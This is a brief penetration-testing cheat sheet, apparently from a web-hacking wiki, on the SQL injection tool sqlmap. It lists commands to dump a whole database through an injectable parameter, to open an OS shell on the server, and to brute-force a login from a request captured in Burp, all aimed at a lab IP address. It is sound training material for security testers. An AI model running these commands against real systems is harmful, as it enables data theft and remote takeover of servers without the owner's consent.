> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/web-application-hacking/web-techniques/sqli/hacking-sql/sqlmap.md).

# sqlmap

## Automate database dump:

`#`<mark style="color:green;">`sqlmap -u`</mark> [<mark style="color:green;">`http://10.10.10.10/debug.php?id=1`</mark>](http://10.10.10.10/debug.php?id=1) <mark style="color:green;">`-p “id” --dbms=mysql --dump`</mark>

<mark style="color:yellow;">--dbms</mark> is the backend database type

<mark style="color:yellow;">--dump</mark> to dump all.

### execute a shell:

`#`<mark style="color:green;">`sqlmap -u`</mark> [<mark style="color:green;">`http://10.10.10.10./debug.php?id=1`</mark>](http://10.10.10.10./debug.php?id=1) <mark style="color:green;">`-p “id” --dbms=mysql --os-shell`</mark>

## Login Portal, SQL Brute Force:

If you have a login prompt that you suspect may be injectable; then setup burp to capture the traffic. Next try to authenticate with`admin:admin` and capture it with burp. Copy the raw request into a file login.req. You may have to clean up the spacing of the request after the c\&p. Then hand it to sql map:\
`#`<mark style="color:green;">`sqlmap -r login.req`</mark>\
//this will auto brute sqli to attempt a login.

{% hint style="success" %}
More coming soon!
{% endhint %}
